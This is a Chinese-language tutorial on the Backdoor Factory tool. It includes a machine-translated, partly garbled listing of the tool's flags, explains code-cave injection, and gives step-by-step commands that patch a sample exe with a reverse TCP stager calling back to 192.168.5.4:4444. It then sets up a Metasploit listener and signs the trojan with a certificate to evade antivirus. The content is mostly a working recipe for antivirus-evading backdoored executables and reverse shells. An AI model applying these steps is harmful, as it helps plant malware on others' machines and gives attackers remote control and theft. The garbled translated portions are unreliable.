后门免杀工具-Backdoor-factory(2)
? -h,——help显示此帮助消息并退出 -f文件,——FILE =FILE文件到后门 - s壳,壳=壳 可用的有效载荷。用show去看 有效载荷。 - h主机,hostip =主机 用于反向连接的C2的IP。 -P端口,——PORT =端口用于连接回shell的端口 或者监听绑定的外壳 如果您想使用code cave,请选择此选项 跳转到进一步隐藏二进制代码中的shell代码。 ————add_new_section 命令向exe添加一个新的部分 (更好的成功)但更少的av回避 - u SUPPLIED_SHELLCODE,user_shellcode = SUPPLIED_SHELLCODE 用户提供的shell代码,确保它匹配 您的目标体系结构。 洞穴标志将找到可以使用的代码洞穴 用来存放shellcode。这将打印到所有 特定大小的代码洞穴。可以使用-l标志 这个设置。 - l SHELL_LEN,shell_length = SHELL_LEN 用于与-c一起使用,以帮助查找不同的代码洞穴 大小 - o输出,输出文件=输出 后门输出文件 = NSECTION - n NSECTION,部分 新节名必须小于7个字符 = DIR - d DIR,目录 这是您想要的文件的位置 后门。您可以创建一个文件回滚目录 通过强制将编解码器附加到 通过使用-a设置执行exe。 -w,——change_access这个标志改变了存储codecave的部分 莱茵集团。有时这是必要的。通过 违约。如果禁用,后门可能会失败。 -i,——injector这个命令将后门工厂变成一个狩猎和 shell代码注入机制的类型。编辑目标 注入器模块中的设置。 - u后缀,后缀=后缀 若要与注入器一起使用,请在原始文件上加上后缀 易于恢复的文件 - d,delete_original 与注入器模块一起使用。这个命令删除 原始文件。不用于生产系统。 作者不对愚蠢的使用负责 - o DISK_OFFSET,DISK_OFFSET = DISK_OFFSET 磁盘偏移量上的起始点,单位为字节。一些作者 要混淆它们在磁盘上的偏移量以避免 逆向工程,如果你找到其中一个文件 找到偏移量后使用此标志。 -S,——support_check,以确定该文件是否在之前得到BDF的支持 秘密文件。单独使用或与他人一起使用 详细的。如果。,则自动执行此检查 后门是未遂。 -M,——洞穴挖掘器的未来用途,以帮助确定最小的shell代码 可能在PE文件中 -q, -no_banner杀死了banner。 -v,——用于调试信息输出的详细信息。 - t IMAGE_TYPE,图像类型= IMAGE_TYPE 所有,仅x86或x64类型二进制文件。默认=所有 -Z,——zero_cert允许覆盖指向PE的指针 证书表有效地删除了证书 从二进制的所有意图和目的。 runas_admin实验检查PE二进制文件 ‘ requestedExecutionLevel水平=“highestAvailable”。如果 这个字符串包含在二进制文件中,它必须以 系统/管理。如果没有在支持检查模式,它会 如果是的话,修改清单中的highestAvailable requestedExecutionLevel条目存在。 如果不想对dll进行补丁,可以使用此设置。 默认情况下补丁。 - f FAT_PRIORITY,FAT_PRIORITY = FAT_PRIORITY MACH-O格式。如果胖档,重点放在哪个拱门上 补丁。默认是x64。要强制x86使用-F x86 两个顶点都使用-F ALL。 - b灯塔,灯塔=灯塔 对于具有信标能力的有效载荷,设置 时间以秒为单位 - m PATCH_METHOD,patch-method = PATCH_METHOD PE文件修补方法,“手动”,“自动”, - b SUPPLIED_BINARY,user_malware = SUPPLIED_BINARY onionduke。提供所需的二进制文件。 -X,——xp_mode默认值:不支持XP遗留机器,使用-X 支持XP。默认情况下,二进制文件将在XP上崩溃 机器(如沙箱) -A,——idt_in_cave实验默认情况下一个新的导入目录表 是在一个新的部分中创建的,通过调用这个标志吗 将被放入一个代码洞穴。这会导致变节 失败是一些例子。首先测试目标二进制文件。 -C,——code_sign为那些与合作设计cert希望签署PE 二进制文件。命名您的签名密钥和私钥 signingcert。cer signingPrivateKey。pem安排 在certs目录中,由您来获取 签字确实的事情。 在预处理过程中执行预处理脚本 目录 ? 0x02?特点功能原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成payload,并且在程序执行的时候,jmp到代码段,来触发payload。 ? 利用其 patch 方式的编码加密技术,可以轻松的生成win32PE后门程序,从而帮助我们绕过一些防病毒软件的查杀,达到一定得免杀效果 ? 工具的一些特点:patch 通过替换 exe、dll、注册表等方法修复系统漏洞或问题的方法 ? 使用于 windows PE x32/64 和 linux ELF x32/64 (OSX) ? ? python 语言编写 ? ? msf 使用的 patch 方法 覆盖程序入口 msfvenom -p windows/shell/reverse_tcp msfvenom -p windows/shell/reverse_tcp –k ? ? CTP 方法 增加新的代码段 session,与 msfvenom的-k 方法类似 ? 代码洞 二进制中超过两个字节的连续 x00 区域(代码片段间区域)
多代码洞跳转(非顺序执行) 初期免杀率可达100% ? ? ? ? 0x03?具体参数使用提一下?不要kali自带的? 是个坑。 随着拿个exe? 小葵转换工具.exe ? ? 安装github都有。 ? ? ? ? 查看是否支持后门patch -f:指定测试程序 backdoor-factory -f kui.exe -S ? ? 指定的?shellcode patch backdoor-factory -f kui.exe -c -l 200 -c:code cave(代码裂缝) ? ? ? 查看支持哪些 payload 的注入: backdoor-factory -f kui.exe -s show ? ? ? 注入payload backdoor-factory -f kui.exe -s iat_reverse_tcp_stager_threaded -H 192.168.5.4 -P 4444 -s:选择使用 payload 类型 ? 选择了code cave的序号即可完成 ? msf监听: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.5.3 set lport 4444 exploit ? ? ? 对比原文件与生成文件MD5值md5sum ./kui.exe /root/kui.exe ? ? 常用参数-c:code cave(代码裂缝) -l:代码裂缝大小 -s:选择使用 payload 类型 -H:选择回连服务器地址 -P:回连服务器端口 -J:使用多代码裂缝注入 ? ? ? PS:看手册是可以添加自己的私钥证书在我们的马儿里面~~~ ? ?看了网上好像没人写这个 ? 使用:将私钥放在一个文件里: echo -n yourpassword > certs/passFile.txt ? 证书格式: signingCert.cer => certs/signingCert.cer signingPrivateKey.pem => certs/signingPrivateKey.pem ? 证书目录: certs ├── passFile.txt ├── signingPrivateKey.pem └── signingCert.cer ? ? 这时候我们需要使用C参数?生成win32pe代码裂缝插入私钥部分。 例子: ./backdoor.py -f kui.exe -s iat_reverse_tcp_inline -H 192.168.5.4 -P 4444 -m automatic -C (编辑:ASP站长网) |